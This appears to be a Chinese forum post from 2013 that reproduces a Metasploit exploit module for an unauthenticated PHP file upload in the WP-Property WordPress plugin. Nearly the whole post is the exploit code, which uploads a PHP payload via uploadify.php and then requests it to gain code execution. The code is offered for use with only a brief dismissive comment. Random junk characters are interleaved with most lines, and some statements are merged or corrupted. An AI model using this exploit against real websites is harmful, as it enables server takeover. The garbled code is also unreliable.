WordPress WP-Property PHP 文件上传漏洞# h% E- Y2 c3 A( A, F
, \- {- x. j) h3 u5 ]
## # This file is part of the Metasploit Framework and may be subject to- Y% ?: I3 H: F( v9 l. \
( }2 s. ^6 y7 `& x' T2 `+ I! b
# redistribution and commercial restrictions. Please see the Metasploit1 Q$ Z, r' M$ K2 N [
4 ]8 y0 r2 t+ n$ d9 q3 m ~
# Framework web site for more information on licensing and terms of use.3 t: z! V1 ?7 C) b$ q* H' L f
7 u7 a9 y6 e7 E8 A6 Y+ W1 t2 d
# http://metasploit.com/framework/ ##
' U; I! ]. J4 K* D0 ^/ T% F9 Q
: |1 y3 T( i! d/ U5 W
1 X5 O( I% h$ u* H9 o w
( B z9 ~3 b6 Z( \! p9 m
3 H" u% l6 y' W) N4 f( d; C
" B m4 T0 G5 N( K; A- W% Arequire 'msf/core' K2 _. h7 M+ U2 w! y# _7 w6 \# j
require 'msf/core/exploit/php_exe'
& H$ s I8 ^! O. v6 ]
3 b$ O; K4 M9 }. Bclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
" I ?: _" O. J1 T8 r'Description' => %q{! A" o. t" B+ V/ c" O+ n
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
# {- B4 T& s' d& H3 }1 ~4 c- [[
9 h4 R6 F& Q" y'Sammy FORGIT', # initial discovery: V' r5 ~* M8 E4 F: x) x5 v- b
'James Fitts <fitts.james[at]gmail.com>' # metasploit module7 D. c9 [5 l& Q' C
], T8 R7 d# t* D/ H
'License' => MSF_LICENSE,
( v1 S& g9 S. ^. a# k* e'References' =>
9 D' R4 n Y0 i! D) i[
4 E; l, u$ s& k# J% ^- P% q; I[ 'OSVDB', '82656' ],. Z! p3 J- e/ l/ e9 |/ G
[ 'BID', '53787' ],- Y: t7 U. f" F# p2 y
[ 'EDB', '18987'],
" ?7 P2 ]# r9 o# ][ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
. L3 v* B% c. s5 Q, V, p* E- h],- e) e' E7 V( n( |- y
'Payload' =>) t r: |9 z% J' m$ x
{
9 R( A3 {8 d8 v3 B* H'BadChars' => "\x00",0 Q! J% m ?( A4 Q4 y- r; V
},
$ s% \% Q# X5 K; o& j9 S'Platform' => 'php',
6 _8 h D- O( d( N# F/ f; ^'Arch' => ARCH_PHP,
8 t3 j* E1 Y5 w. F1 ?* C'Targets' =>
6 Q% L' ~) |9 t3 D/ v D- E[) M! L: k3 m0 [5 y* U$ S
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
6 w8 ?9 w3 S/ d6 k[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 j% Q/ W2 T7 ~],
4 i3 B0 o @6 F! [- H5 a2 p'DefaultTarget' => 0,
( }8 w% W8 {* y% I'DisclosureDate' => 'Mar 26 2012'))' U, h, H/ Q: a1 a( L
4 l( X2 J p# h% H, v
register_options(
i d' R5 ?0 m7 H- w$ O3 [[7 c) S" g5 n, `5 l$ v9 E- z
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
7 Z! d4 Q l# X% Y: X], self.class)$ l6 n: B3 a3 o, x
end
d1 i" i6 c1 {: E- F7 z1 `+ A. j" Q
) `' n" M; t/ h- y. d. D/ pdef check5 T8 M) _# d$ n9 @( g5 P
uri = target_uri.path4 s+ \" k3 U) P% S* z( o% F
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',. w2 m+ F! I& x! a; r1 M5 W
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 [3 c7 x% c6 ^/ H
})
H8 y: V! Y& W# e1 J( W4 w# o1 ~0 @
1 {5 E) q/ T) {2 y: c0 cif not res or res.code != 200
2 k3 u1 j8 ~: K# E9 mreturn Exploit::CheckCode::Unknown
7 P" s. r0 A, ~, _& j, e8 iend
. a! ]3 y, P. k2 b; L. n' {/ \1 c+ s7 ^# j. y! Y8 B0 F- a, A
return Exploit::CheckCode::Appears* v1 p, o' p [( b4 x
end- y0 F, A/ C9 W5 R$ w
/ X. j+ @" O; [9 a6 ~8 Wdef exploit( a6 c" x3 l7 D
uri = target_uri.path
* e, A2 h4 e/ p' l) C) h vuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
/ V7 S! F) X& G9 c
- k$ R+ `% _8 C0 ?, }( j& Edata = Rex::MIME::Message.new# z* Y# @6 j8 R
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")3 Z9 j9 J0 f! U# l# P; M2 n
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")0 e) ~. b% J$ S
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
8 b& G" ^% K7 }$ x* p
" V% x q, _1 ?% M' F |print_status("#{peer} - Uploading payload #{@payload_name}")1 A& P: C! ~3 T3 _
res = send_request_cgi({
1 \) \1 r' d! f'method' => 'POST',
7 n9 ~$ s0 `( b$ }4 [/ Q% i5 C'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",6 h# Z9 }4 }( K' f& n* c% Y3 c ~2 n
'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ |( v2 K+ z) J# i8 }'data' => post_data
# c% W; c. p0 I( i8 G' Y})
" o: S+ }# I. o1 E7 V: j7 l! Z3 O' \( y' k; ]3 |
if not res or res.code != 200 or res.body !~ /#{@payload_name}/7 O2 j" }0 c: H5 y# {
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
2 T) l% j L2 X2 y9 Yend& y& x' d4 ]3 X" k4 Q
8 X) `0 \- y0 D/ z/ ~0 y; ~
upload_uri = res.body2 ]# e( o* D6 y1 ^
+ K6 q5 W. W; P; X( D
print_status("#{peer} - Executing payload #{@payload_name}")
z# |4 @ D* s2 i+ ^. eres = send_request_raw({
0 S# f0 T: N3 A) o7 x6 ]- v'uri' => upload_uri,4 P5 t' [5 W5 B+ G1 R
'method' => 'GET'7 K$ \/ h& {# v9 H
})
: U5 M7 _2 b/ `3 Z# Oend7 o* M, n; F9 C8 l' e
end
4 x3 O+ ]+ ?4 T$ j3 N; X) {, E) W4 p# l3 Q
不要问我这写的是什么 怎么利用 我是说msf.2 H- X" y$ K: z7 _( z
8 B3 m- b' H; r0 g9 T# n8 Z |
发表于 2013-1-4 19:51:30
收藏
支持
反对